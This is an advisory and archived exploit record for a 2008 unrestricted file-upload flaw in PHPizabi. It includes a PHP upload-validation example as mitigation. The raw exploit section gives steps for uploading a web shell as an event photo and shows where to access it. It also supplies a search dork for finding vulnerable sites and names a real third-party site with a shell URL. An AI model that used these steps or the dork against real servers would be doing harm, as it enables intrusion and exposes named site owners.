Vendor: PHPizabi
By: ZoRLu
CVSS: 8.8 (HIGH)
Type: Remote File Upload
CWE: 434
Product Name: PHPizabi
Affected Version From: v0.848b C1 HFP1
Affected Version To: v0.848b C1 HFP1
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2008

Powered by PHPizabi v0.848b C1 HFP1 remote file upload

A vulnerability exists in PHPizabi v0.848b C1 HFP1 that allows an attacker to upload a malicious file to the server. An attacker can register on the website, create an event, upload a malicious file as the event photo, and then access the file directly via its URL.

Mitigation:

Ensure that the application only accepts uploads whose file extensions are appropriate for the feature (image extensions for an event photo) and enforces an appropriate maximum file size.
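The following is an added example implementing the mitigation above; it is not PHPizabi's code. The function name, size limit and storage path are assumptions. It allow-lists image extensions, caps the size, checks the real content, and generates the stored filename server-side, so a client-supplied name such as `shell.php` is never written into the pictures directory (the advisory's URLs show the vulnerable version keeping the original name behind a numeric prefix).

```php
<?php
// Added example (not PHPizabi's own code): server-side validation for an
// event-photo upload. Names, limits and paths below are assumptions.

const MAX_PHOTO_BYTES = 2 * 1024 * 1024;                // assumed 2 MiB policy
const ALLOWED_EXTENSIONS = ['jpg', 'jpeg', 'png', 'gif']; // extension allow-list
const ALLOWED_MIME_TO_EXT = [                             // sniffed MIME => stored ext
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
];

/**
 * Validate one $_FILES entry and return the filename to store it under,
 * or a string starting with "reject:" explaining why it was refused.
 * The returned name is generated here, never taken from the client.
 */
function validateEventPhoto(array $file, string $eventId): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return 'reject: upload error';
    }
    if ($file['size'] <= 0 || $file['size'] > MAX_PHOTO_BYTES) {
        return 'reject: file size out of bounds';
    }
    // Extension allow-list on the client-supplied name (rejects shell.php).
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXTENSIONS, true)) {
        return 'reject: extension not allowed';
    }
    // $file['type'] is client-controlled; sniff the actual bytes instead.
    $info = @getimagesize($file['tmp_name']);
    if ($info === false || !isset(ALLOWED_MIME_TO_EXT[$info['mime']])) {
        return 'reject: content is not a supported image';
    }
    // Stored name: event id + random token + extension derived from the
    // sniffed type, so whatever the client called the file is discarded.
    $token = bin2hex(random_bytes(8));
    return sprintf('%d_%s.%s', (int) $eventId, $token, ALLOWED_MIME_TO_EXT[$info['mime']]);
}

// Usage (assumed form field names and storage directory):
// $dest = validateEventPhoto($_FILES['photo'], $_POST['event_id']);
// if (str_starts_with($dest, 'reject:')) { http_response_code(400); exit($dest); }
// move_uploaded_file($_FILES['photo']['tmp_name'], __DIR__ . '/system/cache/pictures/' . $dest);
```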

Exploit-DB raw data:

############################################
Powered by PHPizabi v0.848b C1 HFP1 remote file upload

author: ZoRLu

home: www.yildirimordulari.org

contact: trt-turk@hotmail.com

dork: "Powered by PHPizabi v0.848b C1 HFP1"

############################################

exploit:

http://localhost/izabi/system/cache/pictures/id_shell.php

-First, register on the web site.

-Click "Create an event" and create an event (direct create-event URL: http://localhost/izabi/?L=events.create ).

-Write the event title and description. For "show to", select All users. Click the gözat (browse) button and upload shell.php.

-Then go to the event page. Right-click the uploaded photo, open the menu, click Properties, and copy the URL.

example:

http://localhost/izabi/system/image.php?file=xxx_shell.php&width=500

and 

exploit:

http://localhost/izabi/system/cache/pictures/xxx_shell.php

example web site:

http://bitchinindie.com/system/image.php?file=597_shell.php&width=500

exploit shell.php

http://bitchinindie.com/system/cache/pictures/597_shell.php


##################################################

thanx: str0ke, FaLCaTa, ReD_KaN, edish, harded, aRKi, z3h!r, the_KaM!L, vur6un, siircicocuk, Dr. SaLTuK, kasırga(lavrens), avkidis, head_hunter

and all users of yildirimordulari.org

siircicocuk, where are you, bro? Get on MSN, we miss you :)))

## Whether yildirimordulari.org will open again or not, nobody knows, but one thing is known: it is a legend ##

#################################################

# milw0rm.com [2008-02-17]